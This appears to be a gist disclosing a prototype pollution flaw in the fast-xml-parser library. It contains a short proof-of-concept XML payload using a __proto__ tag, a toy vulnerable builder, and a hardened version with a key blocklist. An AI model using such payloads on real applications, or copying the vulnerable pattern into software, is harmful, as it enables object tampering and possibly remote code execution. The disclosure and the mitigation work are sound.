Last active February 12, 2023 11:47

Taking example code from the GitHub repo to demonstrate the bug:

const { XMLParser, XMLBuilder, XMLValidator} = require("fast-xml-parser");

let XMLdata = "<__proto__><polluted>hacked</polluted></__proto__>"

const parser = new XMLParser();
let jObj = parser.parse(XMLdata);

console.log(jObj.polluted) // should return hacked


In the above screenshot you can see that jObj was polluted with a new property.

>{polluted: 'hacked'}

More information on prototype pollution can be found here:

As it is common for developers to pass user-controllable input to XMLParser, this can lead to unexpected results. Chained with a prototype pollution gadget, it might even lead to RCE in some cases.
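The same effect reproduced without the library, as an added example (not code from this gist or from fast-xml-parser): a toy tag-to-object builder shows how using a tag name as a key on a plain `{}` replaces the result's prototype, next to a hardened builder that uses null-prototype containers and rejects reserved key names. `parseElements`, `parseNaive`, `parseHardened` and `prototypeTampered` are hypothetical names, and the builder is an assumption about the general pattern, not the library's implementation.

```javascript
// Added example: toy tag-to-object builder, not fast-xml-parser's code.
// Constructed input, same shape as the PoC document above.
const SAMPLE = "<__proto__><polluted>hacked</polluted></__proto__>";

// Key names that reach the prototype chain when used as obj[key] = value.
const BLOCKED_KEYS = new Set(["__proto__", "constructor", "prototype"]);

// Handles only <tag>text-or-children</tag>: no attributes, no self-closing
// tags, no same-name nesting. makeNode() creates each container object;
// allowKey(tag) decides whether a tag name may become a property name.
function parseElements(xml, makeNode, allowKey) {
  const node = makeNode();
  const re = /<([^\s<>\/]+)>([\s\S]*?)<\/\1>/g;
  let m;
  while ((m = re.exec(xml)) !== null) {
    const [, tag, inner] = m;
    if (!allowKey(tag)) throw new Error(`rejected tag name: ${tag}`);
    node[tag] = inner.includes("<")
      ? parseElements(inner, makeNode, allowKey)
      : inner;
  }
  return node;
}

// Weak form: plain {} containers, every tag name accepted.
const parseNaive = (xml) => parseElements(xml, () => ({}), () => true);

// Hardened form: null-prototype containers plus a key blocklist.
const parseHardened = (xml) =>
  parseElements(xml, () => Object.create(null), (k) => !BLOCKED_KEYS.has(k));

// Check for parser output: true when the prototype is not the default.
function prototypeTampered(obj) {
  const proto = Object.getPrototypeOf(obj);
  return proto !== null && proto !== Object.prototype;
}

const naive = parseNaive(SAMPLE);
console.log(naive.polluted, Object.keys(naive), prototypeTampered(naive));
try {
  parseHardened(SAMPLE);
} catch (e) {
  console.log(e.message);
}
```

In the weak form the result has no own keys at all: `polluted` is reachable only through the swapped prototype, which is why a check on `Object.getPrototypeOf` catches it while `Object.keys` does not.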
